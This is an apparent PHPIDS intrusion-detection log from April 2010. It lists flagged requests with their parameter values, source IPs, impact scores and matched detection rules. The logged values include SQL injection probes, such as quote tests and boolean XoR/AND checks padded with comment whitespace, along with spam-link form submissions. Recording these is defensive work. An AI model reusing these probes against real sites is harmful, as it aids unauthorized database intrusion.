Value:What is it, <a href= http://homemadechristmasgiftidea.imagekind.com/ >Real homemade christmas gift ideas</a>, [url= http://homemadechristmasgiftidea.imagekind.com/ ]Real homemade christmas gift ideas[/url], arl,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 06:55:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123088
Name:POST.codeme
Value:What is it, <a href= http://homemadechristmasgiftidea.imagekind.com/ >Real homemade christmas gift ideas</a>, [url= http://homemadechristmasgiftidea.imagekind.com/ ]Real homemade christmas gift ideas[/url], arl,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 06:55:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123085
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-30 06:46:57
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:123086
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-30 06:46:57
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:123083
Name:REQUEST.uname
Value:'--;
Page:/?uname=%27--%3b
IP:67.195.111.36
Impact:18
Created:2010-04-30 06:46:53
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40

ID:123084
Name:GET.uname
Value:'--;
Page:/?uname=%27--%3b
IP:67.195.111.36
Impact:18
Created:2010-04-30 06:46:53
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40

ID:123081
Name:REQUEST.codeme
Value:It is a very good thing, <a href= http://lastminutevalentinegifts.imagekind.com/ >Discount last minute valentine gifts</a>, [url= http://lastminutevalentinegifts.imagekind.com/ ]Discount last minute valentine gifts[/url], 1866,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 04:11:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123082
Name:POST.codeme
Value:It is a very good thing, <a href= http://lastminutevalentinegifts.imagekind.com/ >Discount last minute valentine gifts</a>, [url= http://lastminutevalentinegifts.imagekind.com/ ]Discount last minute valentine gifts[/url], 1866,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 04:11:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123079
Name:REQUEST.codeme
Value:It is a very good thing, <a href= http://buyminimuffinpans.imagekind.com/#1 >buy mini muffin pans</a> [url=http://buyminimuffinpans.imagekind.com/#1]buy mini muffin pans[/url], pmbg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 03:21:17
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123080
Name:POST.codeme
Value:It is a very good thing, <a href= http://buyminimuffinpans.imagekind.com/#1 >buy mini muffin pans</a> [url=http://buyminimuffinpans.imagekind.com/#1]buy mini muffin pans[/url], pmbg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 03:21:17
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123077
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:121.88.4.141
Impact:12
Created:2010-04-30 02:44:21
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123078
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:121.88.4.141
Impact:12
Created:2010-04-30 02:44:21
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123075
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:121.88.4.141
Impact:12
Created:2010-04-30 02:44:08
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123076
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:121.88.4.141
Impact:12
Created:2010-04-30 02:44:08
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123073
Name:REQUEST.id
Value:'
Page:/newscat.php?id='
IP:121.88.4.141
Impact:12
Created:2010-04-30 02:43:55
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123074
Name:GET.id
Value:'
Page:/newscat.php?id='
IP:121.88.4.141
Impact:12
Created:2010-04-30 02:43:55
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123071
Name:REQUEST.codeme
Value:Excellent site. It was pleasant to me., <a href= http://buypitteddates.imagekind.com/#1 >buy pitted dates information</a> [url=http://buypitteddates.imagekind.com/#1]buy pitted dates information[/url], 63359,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 02:30:44
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123072
Name:POST.codeme
Value:Excellent site. It was pleasant to me., <a href= http://buypitteddates.imagekind.com/#1 >buy pitted dates information</a> [url=http://buypitteddates.imagekind.com/#1]buy pitted dates information[/url], 63359,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 02:30:44
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123069
Name:REQUEST.codeme
Value:Great, <a href= http://buyfreshbluecheese.imagekind.com/#1 >buy fresh blue cheese</a> [url=http://buyfreshbluecheese.imagekind.com/#1]buy fresh blue cheese[/url], 8-(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-30 01:40:29
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123070
Name:POST.codeme
Value:Great, <a href= http://buyfreshbluecheese.imagekind.com/#1 >buy fresh blue cheese</a> [url=http://buyfreshbluecheese.imagekind.com/#1]buy fresh blue cheese[/url], 8-(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-30 01:40:29
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123067
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:34:04
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123068
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:34:04
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123065
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:34:03
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123066
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:34:03
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123061
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:02
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123062
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:02
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123063
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:02
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123064
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:02
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123059
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:01
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123060
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:01
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123057
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:00
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123058
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
IP:110.230.228.252
Impact:38
Created:2010-04-30 01:34:00
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123055
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:58
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123056
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:58
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123053
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:57
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123054
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:57
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123051
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:52
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123052
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:52
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123049
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:51
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123050
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:51
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123047
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:50
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123048
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:50
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123045
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:49
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123046
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:49
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123043
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:48
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123044
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:48
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123041
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:47
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123042
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:47
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123039
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:46
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123040
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:46
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123037
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:45
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123038
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:110.230.228.252
Impact:66
Created:2010-04-30 01:33:45
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123033
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123034
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123035
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123036
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:110.230.228.252
Impact:6
Created:2010-04-30 01:33:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123031
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:43
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123032
